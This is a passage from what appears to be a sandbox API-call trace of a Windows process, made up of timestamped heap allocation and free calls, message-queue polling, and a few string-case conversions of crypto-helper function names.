RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0034.631] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0034.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0034.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0034.631] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0034.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0034.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0034.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da228 [0034.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0034.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0034.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0034.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0034.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x158e5) returned 0x955018 [0034.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0034.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da258 [0034.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0034.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0034.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0034.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2e8 [0034.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0034.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0034.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0034.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da348 [0034.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0034.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0034.632] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0034.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c760 [0034.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0034.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0034.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0034.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0034.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0034.632] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x158e5) returned 0x9801f8 [0034.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0034.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0034.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0034.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0034.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0034.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0034.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0034.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0034.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0034.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0034.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0034.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0034.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0034.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0034.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0034.633] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0034.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0034.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0034.633] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0034.633] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0034.634] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0034.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0034.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0034.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0034.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0034.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0034.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0034.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0034.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0034.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0034.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0034.634] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0034.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0034.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0034.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0034.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da3f8 [0034.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0034.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0034.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0034.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0034.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8896a0 [0034.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0034.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0034.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0034.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0034.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0034.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0034.634] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0034.634] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0034.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0034.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0034.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0034.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0034.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0034.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0034.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0034.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0034.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0034.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0034.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0034.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0034.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0034.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0034.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0034.635] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0034.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0034.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0034.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0034.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0034.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0034.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0034.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0034.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0034.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0034.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0034.635] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0034.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0034.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0034.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0034.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0034.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0034.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0034.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0034.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0034.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0034.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0034.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0034.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0034.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0034.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0034.636] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0034.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0034.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0034.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0034.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0034.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0034.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0034.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0034.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0034.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0034.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0034.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0034.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0034.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0034.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0034.636] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0034.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0034.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0034.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0034.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0034.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0034.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0034.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0034.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0034.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0034.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0034.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0034.637] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0034.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0034.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0034.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0034.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0034.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0034.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0034.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0034.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0034.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0034.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0034.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0034.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0034.637] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0034.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb68 [0034.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0034.637] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0034.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0034.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0034.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0034.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0034.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0034.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0034.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0034.637] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0034.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0034.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0034.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0034.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0034.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0034.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0034.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0034.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0034.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0034.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0034.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0034.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0034.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0034.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0034.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0034.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0034.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0034.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0034.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0034.638] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0034.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0034.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0034.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0034.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0034.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0034.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0034.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0034.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0034.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0034.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0034.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0034.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0034.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0034.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0034.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0034.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0034.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0034.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0034.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0034.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0034.639] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0034.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0034.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0034.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0034.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0034.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0034.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0034.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0034.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0034.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0034.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0034.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0034.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0034.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0034.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0034.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0034.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0034.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0034.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0034.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0034.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0034.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0034.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0034.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0034.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0034.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0034.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0034.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0034.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0034.640] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0034.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0034.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0034.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0034.640] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: 